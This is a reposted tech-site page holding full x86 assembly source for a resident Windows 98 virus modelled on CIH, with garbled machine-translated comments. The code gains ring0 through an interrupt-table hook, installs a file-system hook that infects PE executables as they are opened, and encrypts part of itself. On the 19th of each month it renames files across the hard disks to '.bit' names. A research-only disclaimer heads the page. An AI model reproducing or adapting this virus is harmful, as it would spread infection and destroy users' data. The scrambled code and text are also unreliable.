2. Tech
  3. Resident virus under Win98

Resident virus under Win98

xiaoxiao2021-03-06  42

*********************************************************** **************; * Editor's words *; * ---------------------------- ------------------------------- *; * (1) Compile connection method (with Tasm5.0 compiler) * ; * Tasm / m bit *; * TLINK32 bit *; * ------------------------------------ ------------------------- *; * (2) This is a true virus program. Only for computers with strong interest in viruses *; * Burger research. If someone is used for malicious dissemination, the profile has nothing to do. *; * ----------------------------------------------- -------------- *; * (3) This process is extremely destructive, please don't try it easily. *; * ----------------------------------------------- -------------- *; * (4) Reference: *; * CIH source program, CAW source *; * MSDN document, "Mystery of Winows 95 System Programming" *; ** *********************************************************** ***********

*********************************************** * This is a 32 virus program that can infect Windows 9X system *; ******************************** **************. 586p.model flat.code

; ***************; * Set the run status of the program *; *************** ******** Debug = 0; ******************; * VXD function call *; ************ ***** _ PAGEAllocate = 00010053HIFSMGR_RING0_FILEIO = 00400032HUNITOBCSPATH = 00400041HIFSMGR_INSTALLESYSTEMAPIHOOK = 00400067H; ******************************************************************* ********************************************; * *; * boot module *; * *; ************************************************************ ***************************************** Start: @a = $ xchg eax, esioriginaLENTRYPOINT = $ 1 MOV EAX, 'Pvok' xor eax, esi [key- @ a] push eaxif debug interruptnumber = 05HELSE interruptnumber = 03hendif

PUSH EAX SIDT [ESP-02H] POP ​​EBX Add Ebx, InterruptNumber * 08H

Lea Eax, ESI [MyFaultHook- @ a] Push Eax CLI MOV [EBX], AX SHR EAX, 16 MOV [EBX 6], AX STI Pop Eax; ************** ************; * Generate an interrupt to get 0 privileges *; ************************* INTERRUPTNUMBERQUITMYPROGRAM: POP EaxReturnFrommyProgram: RET DB 0E0H; ***********; * Data area *; *********** KEY DB 0LOCATIONTABLE DD SIZEOFSECTIONB; segment size DD OFFSTOFSECTIONB 401000H; Duan's virtual address DD 0, 0 DD 0, 0 DD 0, 0; ***********************; * My Ring0 privilege code *; ******************************************** MYFAULTHOK: MOV ECX, DR3 Jecxz MyProgramisNotinstalled IretMyProgramisNotinStalled: xor Eax, EAX CDQ Push 0fh; Flag Push Eax; Physaddr Dec EDX push edx; maxPhys push eax; minPhys push eax; AlignMask push eax; VM = 0 inc eax; Let EAX = 1 push eax; nType = PG_SYS (01h) push eax; nPages = 1 int 20h dd _PageAllocate add esp, 04h * 08htest Eax, EAX JNZ SUCCESSFULLYALLOCATE IRETD

SuccessFullyallocate: MOV EDI, EAX PUSHAD LEA EBX, ESI [LocationTable-Start]; Access to the base number MOV EAX, ESI [Key- @ A-1]; obtain the unlocked key; ******** *********************************; * Copy the virus code to allocated system memory area *; * *************************************************** To ECX, ECX MOV CL, SIZEOFSECTIONA CLD REP MOVSB ​​PUSH EDINUMBEROFSECTIONS = $ 1 MOV DL, 1LOOPOFTRANSFERRING: MOV ECX, [EBX] MOV ESI, EBX [4] Add EBX, 8 CALL ConvertCode DL jnz loopoftransferring ret; ************ ****************************; * Encryption / decryption program *; * ------------- ------------------------- *; * Entrance parameters: *; * AH - key *; * ECX - to encrypt the byte Number *; * ESI - start address *; * EDI - stored address of encrypted information *; ******************************************************************** CONVERTCODE: @B = $ CLDLOOPOFCONVERTING: lodsb xor al, ah stosb loop LoopOfConverting ret; **************************************** **************************************; * *; * Guide module end *; * * *********************************************************** ****************************; -------------------- -------- SizeOfsectionA = $ -start offsetofsectionb = $ -start;

----------------------------; ********************* *********************************************************** *******;* *;* functional module *;* *;******************************* ****************************************************** Sectionb :; *************************; * Install the file hook of IFSMGR *; ************** *********** popad add eax, MyFileSystemApiHookFunction-Start mov esi, eax push eax int 20h dd IFSMgr_InstallFileSystemApiHook pop ecxtest eax, eax jnz SuccessfullyInstallFileSystemApiHook iretdSuccessfullyInstallFileSystemApiHook: mov dr3, esi lea ecx, edi [PreFileSystemApiHook-Start] MOV [ECX], EAX Save the previous file hook Dec Byte Ptr ECX [isbusy-prefilesystemapihook]; set my file hook 'idle' flag IRETD; *********************; * Restore old search path *; ******************************** GETOLDSEARCHPATH: SUB EDI, ECX MOV [EDI], '*. *' Ret; ** ******************; * My file hook function *; ******************** * MyFileSystemapiHookFunction:

; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~; when the system enters a file handle hook function, the use of the stack as shown below; ______________________________; | Return EIP | Low Address; | ______________________________ |; | FSDFnAddr | ---> 00h; | ______________________________ |; | FunctionNum | ---> 04h; | ______________________________ |; | Drive | ---> 08h; | ______________________________ |; | ResourceFlags | ---> 0ch; | ______________________________ |; | CodePage | ---> 10h; | ______________________________ |; | pir | ---> 14h; | ______________________________ | High Address ;; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~; After the instruction 'pushad', the use of the stack is shown in the figure below; _____________________________; | EDI | ---> ESP (Low Address ); | _____________________________ |; | ESI |; | _________________ _____________ |; | EBP |; | ______________________________ |; | ESP |; | ______________________________ |; | EDX |; | ______________________________ |; | ECX |; | ______________________________ |; | EBX |; | ______________________________ |; | EAX |; | ______________________________ | ; | Return EIP | ---> 20h; | ______________________________ |; | FSDFnAddr | ---> 24h; | ______________________________ |; | FunctionNum | ---> 28h; | ______________________________ |; | Drive | ---> 2Ch;

| ______________________________ |; | ResourceFlags | ---> 30h; | ______________________________ |; | CodePage | ---> 34h; | ______________________________ |; | pir | ---> 38h (High Address); | ______________________________ | ;; ~~ ~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ call @CGetBaseAddressOfFileNameString: lea esi, edx [130h] cmp byte ptr [esi], 0 jnz QuitGettingBaseAddressOfFileNameString lea esi, edx [2Ch] QuitGettingBaseAddressOfFileNameString: ret @ C: pop edi add edi, VxdCall_IFSMgr_Ring0_FileIO- @ C; in this module, EDI As the base number MOV EBP, ESP CMP BYTE PTR EDI [ISBUSY- @ D], 00H; my file hook "idle"? Jz myfilesystemapihookfunction managementInsfree; ************** *****************; * If my file hook function is busy, then *; * only calls the FSD service and returns *; ******** ********************************* MYFILESTEMAPIHOK FunctionInsbusy: Push DWORD PTR EBP [38H]; [EBP 38H] -> FSD Service Uppoint Call EBP [24h] POP ​​ECX MOV EBP [1ch], EAX; Save FSD Service Return Value Popad Ret; ***** *************; * My file hook function is idle *; ******************* ******* MyFileSystemapiHookFunctionInsystem: CMP DWORD PTR EBP [28h], 36; Is the FSD function number for IFSFN_Open? JNZ GotopRefilesystemapihook byte Ptr Edi [isbusy- @ D]; Set my file hook 'busy' flag

MOV EDX, EBP [38H] MOV EDX, EDX [0ch] Add Edx, 4; EDX points to Unicode path Lea ESI, EDI [BCSWANSIFILENAME]; ESI points to buffer MOV Al, EBP [2ch] CMP Al, -1; Whether to be a UNC (Universal Naming Conversation) address? JZ Callunitobcspath Add Al, 40H MOV [ESI], Al Inc ESI MOV BYTE PTR [ESI], 'INC EsicalLunitobcspath: xor ECX, ECX PUSH ECX; Charset = BCS_WANSI PUSH 07FH; File Name Buffer Baxle Push Es; Unicode String's Atax Push ESI; Buffer INT 20H DD Unitobcspath Add ESP, 04H * 04H

MOV [ESI ESI EAX-4], 'EXE.'; Is this file a executable file? JNZ AbortonnoexecutableFileif Debug CMP [ESI EAX-8], 'Tset'; is a test file (Effective in debugging)? JNZ AbortonnoExecutablefileEndif Dec ESI Dec ESI; ESI points to the base address of the ordinary ASCII string; ######################### ####; # my triggered execution #; ############################################################################################################################################################################################################################################################################ 2 IN AL, 71HIFE Debug Sub Al, 019H; Judgment Date Else Sub Al, 019hendif Jnz EXIX; *********************************************** ********* ********; * Maken name function *; * register parameter: *; * ESI: point to the current path string *; * Edi: Point to the current path string End *; * Edx: pointing to Win32_find_data structure *; *** ***************************************************** If debug incnord PTR EDI [Drivenumber- @ D] endif xchg EBP, EDI LEA EDX, EBP [Win32_Find_Data] Lea ESI, EBP [PATH] Drivenumber = $ 2IF Debug Mov [ESI], '* /: G'ELSE MOV [ESI],' * /: C'endif Mov DWORD PTR ESI [4], "*."; Search Path: 'G: /*.*', 0 Lea EDI, ESI [3]

LEA EAX, EBP [QuitmyTrigger- @ D] push eax; pressing an export address; ***************************************** ********; * Search all directories and files on the hard disk with recursive method *; ************************* ************* scandisk:; ************************; ** Find file and change file Name **; ************************* MOV AX, 4E00H Push 07h POP ECX Call EBP JC Nomorefiles Xchg EAX, EBX; *** ******************; * Form a replacement file name *; ******************** Push ESI PUSH EDI MOV ECX, EDI SUB ECX, ESI Lea EDI, EBP [ReplacingFileName] CLD Rep Movsb Mov Eax, '0000' Stosd Mov Eax, 'Tib.' Stosd Mov [EDI], CL Pop Edi Pop EsisearchNextFile:; * **************; * forms an alternative file name *; *************** ******* Push EDI Push ESI CALL GetBaseAddressoffilenameString Push 13 Pop Ecx CLD Rep Movsb Pop ESI POP EDI

Push Edx Lea Edx, EDI [ReplacingFileName-Path] MOV EAX, [EDX]; ******************************; * Digital ASCII string self-add program *; ************************************** Add Eax, 1 aaa push 03h POP ECXLOOPOFASCIIINC: PUSH EAX LAHF and AH, 0EFH; Clear 'AF' Sign Sahf Pop Eax Pushfd Ror Eax, 8 Popfd AAA Loop LoopofasciiInc Ror Eax, 8 or Eax, 30303030H; -------------- --------------------------------------- ------------------------------- MOV [EDX], EAXLEA EDX, EBP [ReplacingFileName] MOV AX, 5600H CALL EBP POP EDX

MOV AX, 4F00H Call EBP JNC SearchNextFile

MOV AX, 0DC00H Call EBPNOMOREFILES: MOV [EDI], '*. *'; -------------------------------- ---------------- mov ax, 4E00h mov cx, 1016h call ebp xchg eax, ebx jc NoMoreDirectories call GetNewSearchPath jecxz SearchNextDirectory push ebx push ecx call ScanDisk pop ecx pop ebx call GetOldSearchPathSearchNextDirectory: mov ax, 4F00h call ebp jc NoMoreDirectories call GetNewSearchPath jecxz SearchNextDirectory push ecx push ebx call ScanDisk pop ebx pop ecx call GetOldSearchPath jmp SearchNextDirectoryNoMoreDirectories: mov ax, 0DC00h call ebp Ret; ###################; # my triggered execution ends #; ####### ##################################################### ***************************; * Get the final modification date / time *; ********** ****************************; * IFSMGR_RING0_FILEIO's 4304 service is * ; * Get the final modification time / date of the file. But in fact, the service *; * * only returned to the modification time in CX. So what we care about *; * Is another return value? Fortunately, we finally *; * Find it. It is located in the abandoned stack, the linear address is *; * [ESP-0B4H]. Note that the value of the ESP is the value of the execution instruction *; * INT 20H vxdcall ifsmgr_ring0_fileio, is the value of *; * ESP.

********************************************************* * MOV AX, 4304H Call EDI SHL ECX, 16 MOV CX, ESP [-0b8h] MOV EDI [ReadingBuffer-14H], ECX; *****************; * Get Document attribute *; *****************, EAX, EAX MOV AH, 43H; Get_Attributes XOR ECX, ECX PUSH EBX, ECX Test BL, 01H Is the file be read-only file? JZ NOTREADOONLYFILE; *****************************; * To modify read only files to Ordinary documents *; ************************************** Inc EAX XOR ECX, ECX Call Edi JC AbortonmodiFile: Push EBX; Save File The original attribute; *********************; * is read / write open file *; ************** ****** XOR EAX, EAX MOV AH, 0D5H; R0_OpenCreatfile XOR ECX, ECX; Attribute s = FILE_ATTRIBUTE_NORMAL (00h) cdq inc edx; Action = FILE_OPEN (01h) mov ebx, edx inc ebx; ModeAndFlags = OPEN_ACCESS_READWRITE (02h) call edi jc AbortOnOpeningFailure xchg ebx, eax; save file handle to EBX; ****** *************; * read the DOS file header *; ****************** XOR EAX, EAX MOV AH, 0D6H; R0_READFILE PUSH 40H POP ECX; DOS file header size CDQ; start position of the read operation Lea ESI, EDI [ReadingBuffer]; ESI points to the read buffer Push Eax Call EDI POP EAX; ********* **************; * read into the NT file head and the section table *;

************************ MOV EDX, ESI [3ch]; image_dos_header [3ch] points to the offset address of the new EXE file header MOV ESI [- 0ch], EDX; Save the offset address of the NT file header MOV ECX, 378H; 378h is the size of the NT file header and the segment array array of Call EDI CMP DWORD PTR [ESI], 00004550H; this file is an executable file in a PE format ? Jnz abort; ****************; * Check if the file has been infected *; ********* **************** CMP Word PTR ESI [0FEH], 'Cr'; 'RC' is the file that has been infected or file does not have enough space for the remaining space. JZ Abort Movzx Eax, Word PTR ESI [06H]; Image_NT_Headers [06h] -> Numberofsections MOV ECX, EAX XCHG EBP, EDX; EDX is offset CDQ MoV DL, 28h Mul Edi [ReadingBuffer-10h], 0F8H MoV EDI [ReadingBuffer-10h], Eax; save the actual size add Eax, EBP, EBP, calculating the NT file header and the array array; calculates the offset address MOV ESI ESI ESI (-08h], ESI; save the PE file Head offset address in the free space xchg ecx, ebp; EBP = NumberOfSections mov edx, esi [10Ch]; IMAGE_NT_HEADERS [10Ch] -> PointerToRawData mov esi [54h], edx; IMAGE_NT_HEADERS [054h] -> SizeOfHeaders sub edx, eax Get the size of the idle space MOV ESI [-04h], EDX; ----------------------------------- ------------- Lea EAX, ESI [100H] xor ECX, ECX MOV CL, SIZEOFSECTIONA MOV EDX, EAX [08H] Sub Edx, [EAX] CMP EDX, ECX JB RemainNospaceForsectiona Mov Edx, [EAX]; [eax] ->

Virtualsize Add Edx, EAX [04H]; [EAX 4] -> Vitualaddress Xchg ESI, EDX; Save new entry address RVA; -------------------------------------------------------------------------------------------------------------------------- ---------------------------- Mov Edx, Eax [0ch] Add Edx, [EAX] Add [EAX], ECX JMP InsertsectionBremainNospaceForsectiona: cmp edi [ReadingBuffer-04h], ecx jb AbortOnInsufficientSpace mov edx, edi [ReadingBuffer-08h] mov esi, edx add edi [ReadingBuffer-08h], ecx; free space to adjust the offset sub edi [ReadingBuffer-04h], ecx; Adjusting the size of the idle space Insertsectionb: Push ESI PUSH EDX; Save the offset address of the insert position Push ECX PUSH 0; Press End Sign MOV EDI [ReadingBuffer-18h], EBX; Save EBX XOR EBX, EBX MOV ECX, SIZEOFSECTIONB; * *************************; * * is the 'model of my program Block 'looking for space *; *************************; ________________________________; | |;; | | | | ____________________ |; | | | | | | | | | -> 004H; | | | | | -> 004H; | | | | | -> 008H; | SizeOfRawData |; | _____________________ |; | | ---> 00Ch; | PointerToRawData |; | _____________________ |; | | ---> 010h; | PointerToRelocations |; | _____________________ |; | | ---> 014h; | PointerToLinenumbers | ; | ____________________ |; | | ---> 018H; | NumberOfrelocations |; | | _____________________

| | ---> 01Ah; | NumberOfLinenumbers |; | _____________________ |; | | ---> 01Ch; | Characteristics |; | _____________________ | LoopOfInsertingSectionB: mov edx, eax [08h]; [EAX 08h] -> SizeOfRawData sub EDX, [EAX]; calculating the difference in SizeOfrawData and VirtualSize (this difference is the size of the remaining space in this section) JB SearchNextSection; prevents the handle CMP EDX, ECX JB LessSpaceThanneed Mov Edx, ECX JMP SaveParameterLessSpaceThanneed: CMP EDX, 100 JB SearchnextSection Xchg ECX, EdxsaveParameter:; ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------- Mov ESI, EAX [04H] Add ESI, EDI [ReadingBuffer 34h] Add ESI, [EAX] Push ESI; Save the virtual address of this paragraph; ---------------------------------------------- MOV ESI , EAX [0CH]; [EAX 0CH] -> PointertorawData Add ESI , [EAX]; Offset address of this segment insertion position Push ESI; save the offset address of the insertion position; ----------------------- -------------------------- ADD [EAX], ECX; ---------------------------------------------------------------------- ----------------------------------- Push ECX; save this size Sub EDX, ECX XCHG ECX, EDX; how many bytes are not written;

-------------------------------------------------- inc ebx jecxz WriteSectionB cmp bl, 03h jz SearchSpaceInFileHeaderSearchNextSection: add eax, 28h dec ebp jnz LoopOfInsertingSectionBSearchSpaceInFileHeader: cmp edi [ReadingBuffer-04h], ecx jnb FindSpace; ------------------ ------------------------------ XCHG ECX, EBX XCHG EBX, EDI [ReadingBuffer-18h]; ------ ------------------------------------------ Push 12 Pop Eax Mul ECX Add Eax 16 Add ESP, EAX; ------------------------------------------- ----- JMP AbortoninsufficientSpaceFindspace: Mov Eax, EDI [ReadingBuffer-08h] MOV EDX, EAX Add Edx, EDI [ReadingBuffer 34h] Push EDX; Save the last section of the virtual address PUSH EAX; Save the offset address of the last insertion position Push ECX; save the last segment of size Inc EbxWrItemSectionB:; ************************ *********; * Transfer my program code to the write buffer *; *********************** *********** Lea Edx, EDI [ConvertCode- @ D] MOV EDX [Key- @ B], AH MOV ECX, SizeOfsectionB Lea ESI, EDI [WritingBuffer] Push Edi Lea EDI, EDX [Sectionb - @ B] XCHG ESI, EDI Call Edx Pop EBP XCHG ESI, EDI; -------------------------------------------------------------------------------------------------------------------------- --------------- XCHG ECX, EBX XCHG EBX, EBP [ReadingBuffer-18h]; Restore EBX;

------------------------------------------------ MOV EDX [Numberofsections- @ B], Cl; Save Function Module Different Segment LEA EDI, [EDX LocationTable- @ B 8 * ECX-4] LoopofwritingSectionB: MOV AX, 0D601H POP ECX Jecxz FinishWritingSectionB Pop Edx Sub ESI, ECX Call EBP POP EAX STSD STOSD XCHG EAX, ECX Stosd JMP loopofwritingsectionbfinishwritingsectionb: xchg EBP, EDI; ******************** ;;;;;;;;;;;;;;;;;;;;;;;;; * Get and save the entrance address of the original program *; *************************************** LEA EBP, EDI [ReadingBuffer] MOV eax, ebp [34h]; IMAGE_NT_HEADERS [34h] -> ImageBase add eax, ebp [28h]; IMAGE_NT_HEADERS [28h] -> AddressOfEntryPoint lea esi, edi [Start- @ D] lea ecx, esi [ReturnFromMyProgram- @ A] mov BYTE PTR [ECX], 0FFH ; Generate a 'JMP EAX' instruction to turn control to the original program add ECX, OriginaLENTRYPOINT-RETURNFROMMYPROGRAM; ***************; * Enter the import address of the original program *; *********************************** BaX, ESI [Key- @ a] MOV [ECX], Eax; *************************; * Insert the 'boot module' * of the virus; *********** *************** MOV AX, 0D601H POP ECX POP EDX CALL EDI POP EAX MOV EDI [ReadingBuffer 28h], EAX; Modify the entry address of the program; ******* *******************; * Modify the NT file header of the original program *; ******************** ****** Abortoninsufficientspace: Mov Word Ptr Edi [ReadingBuffer 0FEH], 'Cr';

Set infection markers MOV AX, 0D601H MOV ECX, EDI [ReadingBuffer-10h] MOV ESI, EBP MOV EDX, EDI [ReadingBuffer-0ch] Call Edi JMP Closefileabort: xor ECX, ECX; ********** ***; * Close the file *; ************* Closefile: XOR EAX, EAX MOV AH, 0D7H Call Edi; ************* *************; * Restore file final modification date / time *; ***************** **************** JECXZ RestorefileAttribute Lea ESI, EDI [BCSwanSifilename] XCHG EDI, EBX MOV AX, 4303H MOV ECX, EBX [ReadingBuffer-12h] MOV EDI, EBX [ReadingBuffer-14h ] Call EBX XCHG EDI, EBXABORTONOPENINGFAILURE:; ******************; * Restore file properties *; *************** ** RestorefileAttribute: POP ECX MOV AX, 4301H Test CL, 01H JZ NOTESTOREFILEATTRIBUTE Call ediabortonnoexecutablefile: AbortonmodifyingAttributeFail = $ quitmytrigger = $ notrestorefileAttribute = $ call @e; ********************************************* ******; * Form a new search path based on the results of the lookup *; ***************************** ********** GetnewSearchPath: Push ESI CALL GetBaseaddressoffilenameString XOR ECX, ECX CMP Byte Ptr [ESI], '.'; In the DOS system, '.' Represents the current directory, '..'

It indicates the parent directory jz QuitGettingNewPath cldLoopOfGettingNewPath: lodsb test al, al jz ReachEndOfString stosb inc ecx jmp LoopOfGettingNewPathReachEndOfString: mov byte ptr [edi], '/' inc edi mov [edi], '* *.' Inc ecxQuitGettingNewPath: pop esi ret @ E : pop edi dec byte ptr edi [IsBusy- @ E]; set up my files hook 'idle' flag GotoPreFileSystemApiHook: popadPreFileSystemApiHook = $ 2 jmp ds: [ 'PVOK'] VxdCall_IFSMgr_Ring0_FileIO: @D = $ int 20h dd IFSMgr_Ring0_FileIO ret; *******************; * Data section a *; **************************** ISBUSY DB 1 *********************************************************** **; * Dynamic data part *; * ---------------------------------------- --------- *; * The data does not take up any disk space, they are located in the system memory area *; ********************************** *************************; ******************************* ********************* = $ - @D 48HREPLACINGFILENAME = start- @ D 0700HWIN32_FIND_DATA = START- @ D 0C00H; ****** ******************************************** BCSWANSIFILENAME = START- @ D 0a00hreadingBuffer = $ - @ D 28H; (Relative to EDI) WritingBuffer = start- @ D 0B00H; (Relative to EDI); *********************************** ************** SIZEOFSECTIONB = $ -SECTIONB

The usage of system memory area for my program application; _________________________; | | ---> offset 0; |;;;;;;;;;;;; | |; | | ==> Save EBX Register (ReadingBuffer-18h); | | ==> Last Write Date / Time (ReadingBuffer-14h); | | ==> Size of Section Array (ReadingBuffer-10h); ==> Pe Header RVA (ReadingBuffer-0ch); | | ==> Pointer to Free Space (ReadingBuffer-08h); | _________________________ | ==> Size Of Free Space (ReadingBuffer-04h); | | | -> Offset ??? h; | | | | | ==> Offset 0: reading buffer; | |; | _________________________ |; | | |-> Offset 800h; | section THREE | ==> Offset 0: ANS I file name; | |; | |; | |; | | -> offset C00H; | | | | | | ;____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ |

*********************************************************** *****************************; * *; * Function module end *; * *; ******** *********************************************************** ******************* MYPROGRAMSIZE = $ -startend start

*********************************************************** *******; * Sumary *; * this program can do the folload: *; * (1) get ring0 previliege *; * (2) install filesystemapihook *; * (3) My FileSystemapiHook Run steadily *; * (4) The second part of my code is encrypted *; * (5) The program will be actid on the 19th *; * day of every month.After it has been *; * ActiVated, IT Will Search All HardDisk Drive * * Except c for all files and rename am with *; * a new file name with the extansion '.bit'. *; ********************* ****************************************

转载请注明原文地址:https://www.9cbs.com/read-51522.html

9cbs

New Post(0)